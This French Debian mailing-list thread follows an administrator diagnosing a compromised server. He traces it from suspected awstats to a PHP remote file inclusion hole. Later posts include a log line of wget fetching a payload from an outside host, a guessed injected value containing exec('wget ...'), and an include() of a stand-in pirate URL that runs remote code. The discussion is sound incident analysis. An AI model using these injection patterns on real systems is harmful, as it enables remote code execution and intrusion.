awstats, sarge

François Boisson
Bonjour à tous,

A 14h, j'ai eu la surprise de voir un de mes serveur ecroulé (load average à
80), un top très péniblement effectué juste avant les messages

May 27 14:37:55 yoda kernel: VM: killing process perl
May 27 14:39:11 yoda last message repeated 2 times
May 27 14:39:11 yoda last message repeated 4 times
May 27 14:39:11 yoda kernel: Unable to load interpreter /lib/ld-linux.so.2
May 27 14:39:11 yoda last message repeated 8 times
May 27 14:39:46 yoda out of memory [28659out of ]
May 27 14:39:11 yoda kernel: Unable to load interpreter /lib/ld-linux.so.2
[..]

m'a permis de voir un quantité importante d'apache et surtout un certain nombre
de perl exécutant awstats.pl. Un coup d'oeil dans les logs error.log m'a montré

[Tue May 27 13:36:25 2008] [error] [client 81.52.143.15] File does not exist: /var/www/phpBB2/viewtopic.php
[Tue May 27 13:38:09 2008] [error] [client 81.52.143.15] File does not exist: /var/www/phpBB2/viewtopic.php
[Tue May 27 13:42:13 2008] [error] [client 193.252.149.15] File does not exist: /var/www/phpBB2/profile.php
[Tue May 27 13:43:38 2008] [error] [client 81.52.143.15] File does not exist: /var/www/phpBB2/posting.php
--13:47:11-- http://www.ggfirm.com:80/s.txt
=> `s.txt'
Connecting to www.ggfirm.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 112,253 [text/plain]

0K -> .......... .......... .......... .......... .......... [ 45%]
50K -> .......... .......... .......... .......... .......... [ 91%]
100K -> ......... [100%]

13:47:12 (103.81 KB/s) - `s.txt' saved [112253/112253]

[Tue May 27 13:47:22 2008] [error] [client 193.252.149.15] File does not exist: /var/www/phpBB2/privmsg.php
mocks: no process killed
Invalid argument: stop
Missing or bad configuration file.
Invalid argument: stop
mocks: no process killed
[Tue May 27 13:50:54 2008] [error] [client 193.252.149.15] File does not exist: /var/www/phpBB2/posting.php

phpBB2 n'existe plus depuis au moins deux ans sur ce serveur et il ne faut pas s'arrêter
à ça, par contre on voit bien qu'un script a été détourné. Bon, visiblement ça n'a pas marché
et l'intégrité du serveur est conservé (surveillance md5sum), j'ai neutralisé awstats.

Mais ce qui m'étonnes est que j'ai la version 6.4-1sarge3 sur cette machine et cet awstats était
à jour (awstats_6.4-1sarge3) pour sarge. Y-a-t-il une faille sur cette version de awstats? J'avoue
que je suis perplexe. Le serveur est sous haute surveillance bien entendu.

Quelqu'un a-t-il eu echo d'une histoire analogue?

François Boisson

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

Jean-Yves F. Barbier
François Boisson a écrit :
Bonjour à tous,

salut françois

[...]

pas si sûr (mais c'est difficile à dire sans analyser *tous* les logs sur
la période incriminée):
http://mm.gnu.org.in/pipermail/linuxers/Week-of-Mon-20020114/003668.html
et
http://www.mail-archive.com//msg05980.html

Par ailleurs, j'espère que tu gardes tes MD5sums sur une autre machine ou un
support amovible; sinon ils risquent d'être vérolés.

JY
--
<Mercury> At that point it will compile, but segfault, as it should..

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
Le Wed, 28 May 2008 16:56:49 +0200
"Jean-Yves F. Barbier" a écrit:

François Boisson a écrit :
> Bonjour à tous,

salut françois

> [...]
> (surveillance md5sum), j'ai neutralisé awstats.

pas si sûr (mais c'est difficile à dire sans analyser *tous* les logs sur

J'ai, y compris les logs de la passerelle/parefeu/

[...]

Oui, backup régulier et md5sum du fichier md5sum :). Je suis assez confiant.

François

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
"Jean-Yves F. Barbier" a écrit:

> [...]

Par ailleurs, j'espère que tu gardes tes MD5sums sur une autre machine ou un
support amovible; sinon ils risquent d'être vérolés.

C'est le cas bien sûr mais apparement il y a un souci sur le apache de woody.
Le problème s'est reproduit. La machine étant en production et longuement
utilisée, j'ai finalement fait une mise à jour complète:
Il faut savoir que ce serveur a fait Bo->Hamm->Slink->Potato->Woody

* dist-upgrade en woody pour finir la transition.
* upgrade en sarge.

Le noyau étant un 2.2.19, je ne peux pas encore passer sous Etch mais si il y
a un souci, ça ira. J'ai mis un bon nombre de scripts de surveillance mais il
semble que le serveur apache de woody + php + perl ne soit plus sur. (Je pense
que ça n'est que apache, il n'y a aucune requête dans les logs exceptés
quelques lignes.

Il y a eu des failles apache importantes révélées depuis que woody a été
abandonné? En tout cas, je suggère aux personnes ayant un serveur sous woody
de basculer au moins sous sarge.

François Boisson

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

Pascal Hambourg
François Boisson a écrit :

Il y a eu des failles apache importantes révélées depuis que woody a été
abandonné?

[1 juin 2006] Fin du support de la sécurité pour Debian 3.0 [1]
[1 août 2006] DSA-1131 apache - Dépassement de mémoire tampon [2]
[4 septembre 2006] DSA-1167 apache - Mauvaise vérification des entrées [3]

[1] <http://www.fr.debian.org/News/2006/20060601>
[2] <http://www.fr.debian.org/security/2006/dsa-1131>
[3] <http://www.fr.debian.org/security/2006/dsa-1167>

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
Bon, il semble qu'il y ait un souci très net avec le awstats version
6.5+dfsg-1. Sur la machine refaite et surveillée, lorsque que awstats.pl était
sans droit de lecture, tout se passait bien. Dès que j'ai remis le script en
lecture (script vérifié par le md5sum), 12h plus tard, un script était de
nouveau éxécuté via perl et apache. Le seul script perl sur cette machine est
awstats.pl. J'ai modifié awstats. awstats est la version de etch. Peut être il
y a un souci sur une version etch tournant sous sarge mais je m'interroge tout
de même. Il peut y avoir un doute sur la machine, cependant j'ai fait tourner
le script suivant

#!/bin/sh
MDORG=$1
MDEFF=`md5sum-static /$2 | awk '{print $1}'`
# echo $MDORG
# echo $MDEFF
if [ ! $MDORG = $MDEFF ] ; then
echo $2 compromis

sur tous les fichiers décrits dans /var/lib/dpkg/info/*.md5sum:

# cat *.md5sums | awk '{print ".verifie "$1 " "$2}' | sh

et rien d'inquiétant n'était apparu.

Ceci pour info pour ceux qui utilise awstats

François Boisson

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
Bon, j'ai par comprendre et awstats est innocent.

La situation: Une personne arrivait à éxécuter un script perl sous www-data
donc pas l'intermédiaire d'apache. La machine initialement sous woody a été
tout d'abord mise à jour puis complètement nettoyée et vérifiée (je ne pouvais
pas me permettre de la réinstaller, étant donné qu'elle était en usage
permanent et intense). Toujours fidèle au principe «une machine n'est
jamais étanche, il faut donc bétonner la surveillance», je me suis rapidement
aperçu que le problème continuait. Le gars a pu reéxécuter une nouvelle fois
le script perl.

Une étude approfondie des logs m'a permis d'être sur que le problème venait du
serveur et d'Apache. J'ai fini par conserver un log de toutes les requêtes
Apache. Ça m'a permis de constater que le coupable est un bête script PHP
conçu par un élève sous PHP3 il y a longtemps (>6 ans) (script que j'aurais du
vérifier mais bon...), il a fait deux erreurs:

1) Un include d'un fichier d'extension .inc, fichier lisible par ailleurs

2) Ce fichier contenant une fonction pouvant faire une erreur:

une requête http://<URL>/script.php?nom=bidondenimportequoi

affichait à l'écran le nom du fichier .inc. La personne pouvait alors charger
le fichier .inc et l'étudier.

Elle était alors dans la possibilité de faire la fonction PHP
include($nom.htm);
avec $nom comme elle le voulait. Je pense qu'il est alors possible de charger
un document extérieur, peut être en donnant une valeur
"plop.htm;exec('wget http://site/script.php')"
à $nom.

Conclusion:
* Un script PHP de 50 lignes présent sans souci depuis 6 ans peut avoir une
faille béante et révéler sa faille au bout de ces 6 ans.
* Avant d'incriminer awstats, il faut d'abord vérifier ses propres scripts.
Tracer les requêtes apache est la meilleure solution à mon avis. En effet
j'aurais pu réinstaller complètement le serveur, cela n'aurait rien changer...

François Boisson

Au fait quelqu'un sait-il ce qu'est «mocks»???

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

Jean-Yves F. Barbier
François Boisson a écrit :

hé ben, t'as des élèves "intéressants" :-)

Au fait quelqu'un sait-il ce qu'est «mocks»???

c'est un proxy SOCKS5

--
A male mathematician is someone who can count to twenty-one without
unzipping his fly.

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
Le Thu, 05 Jun 2008 17:23:32 +0200
"Jean-Yves F. Barbier" a écrit:

François Boisson a écrit :

hé ben, t'as des élèves "intéressants" :-)

Oui. ça m'aura occupé pendant quelques temps cette histoire...
Pour une fois, ça n'est pas un «kiddy script», le gars s'est quand même tapé
d'étudier le code PHP qu'il pouvait récupérer.

Si quelqu'un a le détail de comment faire avec le include PHP, ça m'intéresse
d'ailleurs.

> Au fait quelqu'un sait-il ce qu'est «mocks»???

c'est un proxy SOCKS5

J'aurais du y penser...

Merci

François Boisson

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

François Boisson
Le Thu, 5 Jun 2008 20:51:49 +0200
François Boisson a écrit:

Si quelqu'un a le détail de comment faire avec le include PHP, ça m'intéresse
d'ailleurs.

En fait c'est extrèmement simple:

un include("http://monsite.labas.pirate/scriptdelamort.quitue");

télécharge le script sur le site ET l'éxécute comme un script PHP. À partir de
là on fait ce qu'on veut. Donc effectivement c'est relativement simple.

Je n'aurais pas pensé que include faisait un tel chargement sur des sites
extérieurs. C'est une fonction assez dangeureuse.

François Boisson

http://wiki.debian.org/DebFrFrenchLists
"Reply-To:"

Franck Joncourt